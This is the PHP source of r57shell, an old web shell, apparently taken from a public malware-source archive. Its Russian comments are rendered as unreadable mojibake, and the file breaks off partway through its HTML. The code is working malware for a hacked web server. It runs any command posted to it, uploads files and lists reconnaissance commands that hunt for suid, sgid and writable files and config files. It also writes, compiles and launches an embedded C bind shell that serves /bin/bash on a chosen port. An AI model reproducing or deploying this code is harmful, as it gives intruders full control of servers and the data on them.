mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
430 lines
15 KiB
Plaintext
430 lines
15 KiB
Plaintext
|
<?
|
|||
|
/******************************************************************************************************/
|
|||
|
/*
|
|||
|
/* __________ ___ ___
|
|||
|
/* \______ \__ __ ______/ | \
|
|||
|
/* | _/ | \/ ___/ _ \
|
|||
|
/* | | \ | /\___ \\ /
|
|||
|
/* |____|_ /____//____ >\___|_ /
|
|||
|
/* -======\/==security=\/=team==\/
|
|||
|
/*
|
|||
|
/* SPECIAL xbIx birthday edition
|
|||
|
/*
|
|||
|
/* r57shell.php - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>: http://rst.void.ru <20><><EFBFBD> www.rsteam.ru
|
|||
|
/* <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1.0 beta (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
/*
|
|||
|
/* <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
/* ~ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* ~ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* ~ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* ~ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* ~ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 4 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
/* - <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> suid <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* - <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> sgid <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* - <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config.inc.php
|
|||
|
/* - <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
/* ~ <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
/* ~ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> /bin/bash <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
/*
|
|||
|
/* 05.03.2004 (c) RusH security team
|
|||
|
/*
|
|||
|
/******************************************************************************************************/
|
|||
|
|
|||
|
## <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
## <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
## <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!!!
|
|||
|
$name="r57"; ## <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
$pass="r57"; ## <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
if(!isset($PHP_AUTH_USER))
|
|||
|
{
|
|||
|
Header('WWW-Authenticate: Basic realm="r57shell"');
|
|||
|
Header('HTTP/1.0 401 Unauthorized');
|
|||
|
exit;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
if(($PHP_AUTH_USER != $name ) || ($PHP_AUTH_PW != $pass))
|
|||
|
{
|
|||
|
Header('WWW-Authenticate: Basic realm="r57shell"');
|
|||
|
Header('HTTP/1.0 401 Unauthorized');
|
|||
|
exit;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
error_reporting(0);
|
|||
|
set_time_limit(0);
|
|||
|
|
|||
|
|
|||
|
/*
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
$language='ru' - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
$language='eng' - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
*/
|
|||
|
|
|||
|
$language='ru';
|
|||
|
|
|||
|
$lang=array(
|
|||
|
'ru_text1' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_text2' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_text3' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_text4' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_text5' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_text6' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
|
|||
|
'ru_text7' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_text8' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_butt1' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_butt2' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_text9' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> /bin/bash',
|
|||
|
'ru_text10' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
|
|||
|
'ru_text11' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
'ru_butt3' => '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
|
|||
|
|
|||
|
'eng_text1' => 'Executed command',
|
|||
|
'eng_text2' => 'Execute command on server',
|
|||
|
'eng_text3' => ' Run command',
|
|||
|
'eng_text4' => 'Work directory',
|
|||
|
'eng_text5' => 'Upload files on server',
|
|||
|
'eng_text6' => 'Local file',
|
|||
|
'eng_text7' => 'Aliases',
|
|||
|
'eng_text8' => 'Select alias',
|
|||
|
'eng_butt1' => 'Execute',
|
|||
|
'eng_butt2' => 'Upload',
|
|||
|
'eng_text9' => 'Bind port to /bin/bash',
|
|||
|
'eng_text10' => 'Port',
|
|||
|
'eng_text11' => 'Password for access',
|
|||
|
'eng_butt3' => 'Bind'
|
|||
|
);
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/*
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>-<2D><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. ( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> )
|
|||
|
<EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
*/
|
|||
|
|
|||
|
$aliases=array(
|
|||
|
/* <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> suid <20><><EFBFBD><EFBFBD><EFBFBD> */
|
|||
|
'find all suid files' => 'find / -type f -perm -04000 -ls',
|
|||
|
|
|||
|
/* <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> sgid <20><><EFBFBD><EFBFBD><EFBFBD> */
|
|||
|
'find all sgid files' => 'find / -type f -perm -02000 -ls',
|
|||
|
|
|||
|
/* <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config.inc.php */
|
|||
|
'find config.inc.php files' => 'find / -type f -name config.inc.php',
|
|||
|
|
|||
|
/* <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */
|
|||
|
'find writable directories and files' => 'find / -perm -2 -ls',
|
|||
|
'----------------------------------------------------------------------------------------------------' => 'ls -la'
|
|||
|
);
|
|||
|
|
|||
|
/* Port bind source */
|
|||
|
$port_bind_bd_c="
|
|||
|
#include <stdio.h>
|
|||
|
#include <string.h>
|
|||
|
#include <sys/types.h>
|
|||
|
#include <sys/socket.h>
|
|||
|
#include <netinet/in.h>
|
|||
|
#include <errno.h>
|
|||
|
int main(argc,argv)
|
|||
|
int argc;
|
|||
|
char **argv;
|
|||
|
{
|
|||
|
int sockfd, newfd;
|
|||
|
char buf[30];
|
|||
|
struct sockaddr_in remote;
|
|||
|
if(argc < 3) usage(argv[0]);
|
|||
|
if(fork() == 0) { // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
remote.sin_family = AF_INET;
|
|||
|
remote.sin_port = htons(atoi(argv[1]));
|
|||
|
remote.sin_addr.s_addr = htonl(INADDR_ANY);
|
|||
|
sockfd = socket(AF_INET,SOCK_STREAM,0);
|
|||
|
if(!sockfd) perror(\"socket error\");
|
|||
|
bind(sockfd, (struct sockaddr *)&remote, 0x10);
|
|||
|
listen(sockfd, 5);
|
|||
|
while(1)
|
|||
|
{
|
|||
|
newfd=accept(sockfd,0,0);
|
|||
|
dup2(newfd,0);
|
|||
|
dup2(newfd,1);
|
|||
|
dup2(newfd,2);
|
|||
|
write(newfd,\"Password:\",10);
|
|||
|
read(newfd,buf,sizeof(buf));
|
|||
|
if (!chpass(argv[2],buf))
|
|||
|
system(\"echo welcome to r57 shell && /bin/bash -i\");
|
|||
|
else
|
|||
|
fprintf(stderr,\"Sorry\");
|
|||
|
close(newfd);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
int usage(char *progname)
|
|||
|
{
|
|||
|
fprintf(stderr,\"USAGE:%s <port num> <password>\n\",progname);
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
int chpass(char *base, char *entered) {
|
|||
|
int i;
|
|||
|
for(i=0;i<strlen(entered);i++)
|
|||
|
{
|
|||
|
if(entered[i] == '\n')
|
|||
|
entered[i] = '\0';
|
|||
|
}
|
|||
|
if (!strcmp(base,entered))
|
|||
|
return 0;
|
|||
|
}";
|
|||
|
|
|||
|
?>
|
|||
|
<!-- <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> -->
|
|||
|
<html>
|
|||
|
<head>
|
|||
|
<title>r57shell</title>
|
|||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
|
|||
|
<STYLE>
|
|||
|
tr {
|
|||
|
BORDER-RIGHT: #aaaaaa 1px solid;
|
|||
|
BORDER-TOP: #eeeeee 1px solid;
|
|||
|
BORDER-LEFT: #eeeeee 1px solid;
|
|||
|
BORDER-BOTTOM: #aaaaaa 1px solid;
|
|||
|
}
|
|||
|
td {
|
|||
|
BORDER-RIGHT: #aaaaaa 1px solid;
|
|||
|
BORDER-TOP: #eeeeee 1px solid;
|
|||
|
BORDER-LEFT: #eeeeee 1px solid;
|
|||
|
BORDER-BOTTOM: #aaaaaa 1px solid;
|
|||
|
}
|
|||
|
table {
|
|||
|
BORDER-RIGHT: #eeeeee 2px outset;
|
|||
|
BORDER-TOP: #eeeeee 2px outset;
|
|||
|
BORDER-LEFT: #eeeeee 2px outset;
|
|||
|
BORDER-BOTTOM: #eeeeee 2px outset;
|
|||
|
BACKGROUND-COLOR: #D4D0C8;
|
|||
|
}
|
|||
|
input {
|
|||
|
BORDER-RIGHT: #ffffff 1px solid;
|
|||
|
BORDER-TOP: #999999 1px solid;
|
|||
|
BORDER-LEFT: #999999 1px solid;
|
|||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
|||
|
BACKGROUND-COLOR: #e4e0d8;
|
|||
|
font: 8pt Verdana;
|
|||
|
}
|
|||
|
select {
|
|||
|
BORDER-RIGHT: #ffffff 1px solid;
|
|||
|
BORDER-TOP: #999999 1px solid;
|
|||
|
BORDER-LEFT: #999999 1px solid;
|
|||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
|||
|
BACKGROUND-COLOR: #e4e0d8;
|
|||
|
font: 8pt Verdana;
|
|||
|
}
|
|||
|
submit {
|
|||
|
BORDER-RIGHT: buttonhighlight 2px outset;
|
|||
|
BORDER-TOP: buttonhighlight 2px outset;
|
|||
|
BORDER-LEFT: buttonhighlight 2px outset;
|
|||
|
BORDER-BOTTOM: buttonhighlight 2px outset;
|
|||
|
BACKGROUND-COLOR: #e4e0d8;
|
|||
|
width: 30%;
|
|||
|
}
|
|||
|
textarea {
|
|||
|
BORDER-RIGHT: #ffffff 1px solid;
|
|||
|
BORDER-TOP: #999999 1px solid;
|
|||
|
BORDER-LEFT: #999999 1px solid;
|
|||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
|||
|
BACKGROUND-COLOR: #e4e0d8;
|
|||
|
font: Fixedsys bold;
|
|||
|
|
|||
|
}
|
|||
|
BODY {
|
|||
|
margin-top: 1px;
|
|||
|
margin-right: 1px;
|
|||
|
margin-bottom: 1px;
|
|||
|
margin-left: 1px;
|
|||
|
}
|
|||
|
A:link {COLOR:red; TEXT-DECORATION: none}
|
|||
|
A:visited { COLOR:red; TEXT-DECORATION: none}
|
|||
|
A:active {COLOR:red; TEXT-DECORATION: none}
|
|||
|
A:hover {color:blue;TEXT-DECORATION: none}
|
|||
|
</STYLE>
|
|||
|
|
|||
|
</head>
|
|||
|
<body bgcolor="#e4e0d8">
|
|||
|
<table width=100%cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td bgcolor=#cccccc>
|
|||
|
<!-- logo -->
|
|||
|
<font face=Verdana size=2>
|
|||
|
<font face=Webdings size=6><b>!</b></font><b> r57shell</b>
|
|||
|
</font>
|
|||
|
</td></tr><table>
|
|||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td align=right width=100>
|
|||
|
<?
|
|||
|
/* change dir */
|
|||
|
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
|
|||
|
/* display information */
|
|||
|
echo "<font face=Verdana size=-2>";
|
|||
|
echo "<font color=blue><b>uname -a : <br>id : <br>pwd : </b></font><br>";
|
|||
|
echo "</td><td>";
|
|||
|
echo "<font face=Verdana size=-2 color=red><b>";
|
|||
|
echo " ".exec("uname -a")."<br>";
|
|||
|
echo " ".exec("id")."<br>";
|
|||
|
echo " ".exec("pwd")."";
|
|||
|
echo "</b></font>";
|
|||
|
echo "</font>";
|
|||
|
?>
|
|||
|
</td></tr></table>
|
|||
|
<?
|
|||
|
/* port bind */
|
|||
|
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
|
|||
|
{
|
|||
|
$w_file=fopen("/tmp/bd.c","ab+") or exit();
|
|||
|
fputs($w_file,$port_bind_bd_c);
|
|||
|
fclose($w_file);
|
|||
|
$_POST['cmd']="cd /tmp/; gcc -o bd bd.c; ./bd ".$_POST['port']." ".$_POST['bind_pass']."; ps -aux | grep bd";
|
|||
|
}
|
|||
|
?>
|
|||
|
<?
|
|||
|
/* alias execute */
|
|||
|
if (($_POST['alias']) AND ($_POST['alias']!==""))
|
|||
|
{
|
|||
|
foreach ($aliases as $alias_name=>$alias_cmd) {
|
|||
|
if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
|
|||
|
}
|
|||
|
}
|
|||
|
?>
|
|||
|
<?
|
|||
|
/* file upload */
|
|||
|
if (($HTTP_POST_FILES["userfile"]!=="") AND ($HTTP_POST_FILES["userfile"]))
|
|||
|
{
|
|||
|
copy($HTTP_POST_FILES["userfile"][tmp_name],
|
|||
|
$_POST['dir']."/".$HTTP_POST_FILES["userfile"][name])
|
|||
|
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font></td></tr></table>");
|
|||
|
}
|
|||
|
?>
|
|||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td bgcolor=#cccccc>
|
|||
|
<?
|
|||
|
/* command execute */
|
|||
|
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la"; }
|
|||
|
echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
|
|||
|
echo "<b>";
|
|||
|
echo "<div align=center><textarea name=report cols=122 rows=15>";
|
|||
|
echo "".passthru($_POST['cmd'])."";
|
|||
|
echo "</textarea></div>";
|
|||
|
echo "</b>";
|
|||
|
?>
|
|||
|
</td></tr></table>
|
|||
|
<table width=100% heigth=0 cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text2]; ?> ::</div></b></font></td></tr>
|
|||
|
<tr><td height=23>
|
|||
|
<?
|
|||
|
/* command execute form */
|
|||
|
echo "<form name=command method=post>";
|
|||
|
echo "<font face=Verdana size=-2>";
|
|||
|
echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray><3E></font> </b>";
|
|||
|
echo "<input type=text name=cmd size=85> <br>";
|
|||
|
echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray><3E></font> </b>";
|
|||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
|
|||
|
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
|
|||
|
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
|
|||
|
echo "</font>";
|
|||
|
echo "</form>";
|
|||
|
?>
|
|||
|
</td></tr></table>
|
|||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text5]; ?> ::</div></b></font></td></tr>
|
|||
|
<tr><td>
|
|||
|
<?
|
|||
|
/* file upload form */
|
|||
|
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
|
|||
|
echo "<font face=Verdana size=-2>";
|
|||
|
echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray><3E></font> </b>";
|
|||
|
echo "<input type=file name=userfile size=85> ";
|
|||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
|||
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
|||
|
echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
|
|||
|
echo "</font>";
|
|||
|
echo "</form>";
|
|||
|
?>
|
|||
|
</td></tr></table>
|
|||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text7]; ?> ::</div></b></font></td></tr>
|
|||
|
<tr><td>
|
|||
|
<?
|
|||
|
/* aliases form */
|
|||
|
echo "<form name=aliases method=POST>";
|
|||
|
echo "<font face=Verdana size=-2>";
|
|||
|
echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray><3E></font> </b>";
|
|||
|
echo "<select name=alias>";
|
|||
|
foreach ($aliases as $alias_name=>$alias_cmd)
|
|||
|
{
|
|||
|
echo "<option>$alias_name</option>";
|
|||
|
}
|
|||
|
echo "</select>";
|
|||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
|||
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
|||
|
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
|
|||
|
echo "</font>";
|
|||
|
echo "</form>";
|
|||
|
?>
|
|||
|
</td></tr></table>
|
|||
|
|
|||
|
|
|||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text9]; ?> ::</div></b></font></td></tr>
|
|||
|
<tr><td>
|
|||
|
<?
|
|||
|
/* port bind form */
|
|||
|
echo "<form name=bind method=POST>";
|
|||
|
echo "<font face=Verdana size=-2>";
|
|||
|
echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray><3E></font> </b>";
|
|||
|
echo "<input type=text name=port size=15 value=11457> ";
|
|||
|
echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray><3E></font> </b>";
|
|||
|
echo "<input type=text name=bind_pass size=15 value=r57> ";
|
|||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
|||
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
|||
|
echo "<input type=hidden name=bind size=1 value=bd.c>";
|
|||
|
echo " <input type=submit name=submit value=\" ".$lang[$language._butt3]." \">";
|
|||
|
echo "</font>";
|
|||
|
echo "</form>";
|
|||
|
?>
|
|||
|
</td></tr></table>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
|||
|
<tr><td bgcolor=#cccccc>
|
|||
